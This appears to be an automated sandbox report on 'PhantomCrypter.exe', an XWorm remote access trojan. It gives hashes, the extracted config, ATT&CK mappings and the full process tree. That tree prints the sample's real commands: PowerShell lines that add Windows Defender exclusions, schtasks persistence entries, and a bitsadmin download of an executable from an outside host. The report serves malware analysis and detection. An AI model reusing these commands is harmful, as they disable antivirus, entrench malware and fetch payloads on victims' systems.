Overview

overview

10

Static

static

3

PhantomCry...er.exe

windows7-x64

10

PhantomCry...er.exe

windows10-2004-x64

10

PhantomCry...on.dll

windows7-x64

1

PhantomCry...on.dll

windows10-2004-x64

1

PhantomCry...ns.dll

windows7-x64

1

PhantomCry...ns.dll

windows10-2004-x64

1

PhantomCry...ib.dll

windows7-x64

1

PhantomCry...ib.dll

windows10-2004-x64

1

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-01-2025 15:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PhantomCrypter/PhantomCrypter.exe

  • Size

    5.2MB

  • MD5

    e877adfe74b6bd2ad9b9f5c73f839152

  • SHA1

    ff73461cd1fc5d9755d8dfa135ed3f6401989d00

  • SHA256

    71e09355e41f28652a3749b8f109c75eb4e2b80fd2d3d651c420d6b1b73aaa96

  • SHA512

    7c0828a3e966dee6e93e8c6797068c1d4b27a9c1b88249381db6028d7ec18b282560a9e215da2f2c9841307c0f1732fea47983107fd606b850386e993f7431d1

  • SSDEEP

    98304:KUJgH4K+NsPeD9k/OYU2HkSBEIHFP2gH4KdBwgH/fkEihw:KUcT+NsPOkeLAVFXTdBwgH/Mr

Score
10/10
xwormdiscoverydropperexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

fSptE7osVO19YSsZ

Attributes
  • Install_directory

    %AppData%

  • install_file

    msedge.exe

  • pastebin_url

    https://pastebin.com/raw/eZa6J63T

aes.plain
aes.plain
aes.plain
aes.plain

Signatures

  • Detect Xworm Payload 11 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Drops startup file 7 IoCs
  • Executes dropped EXE 10 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypter.exe
    "C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypter.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2528
    • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\msedge.exe
      "C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\msedge.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2272
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2152
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2672
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Roaming\msedge.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1356
    • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypters.exe
      "C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypters.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2164
      • C:\Users\Admin\AppData\Roaming\Chrome Update.exe
        "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2432
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:444
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2292
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2740
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:740
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2764
        • C:\Windows\SysWOW64\bitsadmin.exe
          "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe
          4⤵
          • Download via BitsAdmin
          • System Location Discovery: System Language Discovery
          PID:2196
      • C:\Users\Admin\AppData\Roaming\msedge.exe
        "C:\Users\Admin\AppData\Roaming\msedge.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:764
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1564
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:640
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2496
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2652
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2980
      • C:\Users\Admin\AppData\Roaming\OneDrive.exe
        "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1308
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1828
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2628
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2504
      • C:\Users\Admin\AppData\Roaming\TOPHERC.exe
        "C:\Users\Admin\AppData\Roaming\TOPHERC.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2612
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {22B5E4BA-CBC6-430C-87E3-7017E73DF2DE} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]
    1⤵
      PID:2520
      • C:\ProgramData\OneDrive.exe
        C:\ProgramData\OneDrive.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2196
      • C:\Users\Admin\AppData\Local\msedge.exe
        C:\Users\Admin\AppData\Local\msedge.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1620
      • C:\ProgramData\OneDrive.exe
        C:\ProgramData\OneDrive.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2140
      • C:\Users\Admin\AppData\Local\msedge.exe
        C:\Users\Admin\AppData\Local\msedge.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2868

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Persistence

    BITS Jobs

    1
    T1197

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Defense Evasion

    BITS Jobs

    1
    T1197

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    Lateral Movement

    Collection

    Command and Control

    Web Service

    1
    T1102

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\PhantomCrypters.exe
      Filesize

      5.0MB

      MD5

      d4d28f2c6fd9af9ee5a3be30f9ab913b

      SHA1

      be4264bceaff957ff799b73ebc2479f0fc794815

      SHA256

      c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e

      SHA512

      7eed5b6d3420c930a07aee500e086ec61fd33099cd641a2efe7664081c0e5fdab4d1ad2b4835edcbe3e6722d44e60a75119a2900cfd00b7c182b20f379d7a977

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter\msedge.exe
      Filesize

      165KB

      MD5

      8c92b315d88907a31ad9eaa934a60660

      SHA1

      89c26c8a1f5b2db85e628a6526c9431e7febe5f8

      SHA256

      bea75b57f940b13d5bfcb05a0c3ae1def9d2d25f6c3115fc7b2bf85232175672

      SHA512

      b294fd15ac63bbd7cfd444c9df5a03c7bce8bc98d2b2d2011e5290638fba689ff083260ed60688cc4b0a0a59299dda0b1cc09ba8f63daf92efbeeaed604ebfc2

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Chrome Update.exe
      Filesize

      152KB

      MD5

      16cdd301591c6af35a03cd18caee2e59

      SHA1

      92c6575b57eac309c8664d4ac76d87f2906e8ef3

      SHA256

      11d55ac2f9070a70d12f760e9a6ee75136eca4bf711042acc25828ddda3582c8

      SHA512

      a44402e5e233cb983f7cfd9b81bc542a08d8092ffa4bd970fc25fe112355643506d5dfee0dd76f2e79b983df0fde67bfc50aabb477492a7596e38081e4083476

      Download Submit

    • C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta
      Filesize

      844B

      MD5

      3f8a283abe6fe28a7d217c8105041426

      SHA1

      0283cd67e7cc0a99eeae3c3dea69716a6ac75bb1

      SHA256

      333c439c84ccbcab11dd9cc7f4d90596c5b65caf1164e8a908e61aa0222916b1

      SHA512

      bc5f8f256356c689953516877f8b7895fb1efe587feabdddf0e1524d0b22e3dcb89e0e654d19d0c314c6a376a0e7594965178a353d147ea98c43d3d5976f1846

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      576ac566f845949d7ab915f2894abc52

      SHA1

      3929660a068bb82eb82ee9e30dfb9e5e3a89548f

      SHA256

      d8c0a5847230bd9ad9447643f28831eabe34b1fc979e0c1c25d19de26bf22975

      SHA512

      bd7d7c362e51455841118d7658fe4b8881a5beabed8952ccbafa8bd45db0f7519e7b479460891b4c7371faf8ad9bf309761349c6149398dd7f5dc286a567951d

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk
      Filesize

      687B

      MD5

      253499116622809a0a94e4ecfc35c75f

      SHA1

      7e49870b8bc74d3ec0d097c00f622a782de68423

      SHA256

      5161dfe82e1677d698b5fa2856a95fb705d28c4b5c0f5057399de697cd91ac7b

      SHA512

      d1a5077ac547721bdebcf45ef6f0a8db5f8d97465e1483a75077ffaee3bdbce2d9e6d73ef3022c5228cb73ce768eaad2df14d014f08bc404aed97f9de64eb256

      Download Submit

    • C:\Users\Admin\AppData\Roaming\OneDrive.exe
      Filesize

      140KB

      MD5

      a1cd6f4a3a37ed83515aa4752f98eb1d

      SHA1

      7f787c8d72787d8d130b4788b006b799167d1802

      SHA256

      5cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65

      SHA512

      9489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355

      Download Submit

    • C:\Users\Admin\AppData\Roaming\TOPHERC.exe
      Filesize

      4.2MB

      MD5

      79f2fd33a188ff47216b4f4dd4552582

      SHA1

      16e40e0a1fed903fec20cd6cd600e3a2548881ad

      SHA256

      cc45d38fa00c5aeb33bdf842166460117b5e70b0b4fcf5bb6ef9747ec0b0575f

      SHA512

      caa33702fdc7e480a6093d2af035f860044a4e960fd6e5a4b91d6019f2c3d4c235d9e95734e6b54ea2a88af4e96bf72a54d81b2a70c1f64e76dcd202891905f2

      Download Submit

    • C:\Users\Admin\AppData\Roaming\msedge.exe
      Filesize

      166KB

      MD5

      aee20d80f94ae0885bb2cabadb78efc9

      SHA1

      1e82eba032fcb0b89e1fdf937a79133a5057d0a1

      SHA256

      498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d

      SHA512

      3a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42

      Download Submit

    • memory/764-35-0x0000000000AF0000-0x0000000000B1E000-memory.dmp

      Filesize

      184KB

      Download

    • memory/1620-163-0x00000000012F0000-0x000000000131E000-memory.dmp

      Filesize

      184KB

      Download

    • memory/2140-170-0x00000000000E0000-0x0000000000108000-memory.dmp

      Filesize

      160KB

      Download

    • memory/2152-69-0x000000001B740000-0x000000001BA22000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2152-70-0x0000000001D80000-0x0000000001D88000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2164-13-0x0000000000F30000-0x0000000001438000-memory.dmp

      Filesize

      5.0MB

      Download

    • memory/2196-161-0x0000000000060000-0x0000000000088000-memory.dmp

      Filesize

      160KB

      Download

    • memory/2272-155-0x000007FEF5BF0000-0x000007FEF65DC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2272-27-0x000007FEF5BF0000-0x000007FEF65DC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2272-9-0x00000000011B0000-0x00000000011DE000-memory.dmp

      Filesize

      184KB

      Download

    • memory/2528-0-0x000007FEF5BF3000-0x000007FEF5BF4000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2528-1-0x0000000000A80000-0x0000000000FB6000-memory.dmp

      Filesize

      5.2MB

      Download

    • memory/2612-42-0x0000000000270000-0x00000000006A8000-memory.dmp

      Filesize

      4.2MB

      Download

    • memory/2728-33-0x0000000000AC0000-0x0000000000AE8000-memory.dmp

      Filesize

      160KB

      Download

    • memory/2760-21-0x0000000000010000-0x000000000003C000-memory.dmp

      Filesize

      176KB

      Download

    • memory/2960-48-0x0000000001E60000-0x0000000001E68000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2960-47-0x000000001B8A0000-0x000000001BB82000-memory.dmp

      Filesize

      2.9MB

      Download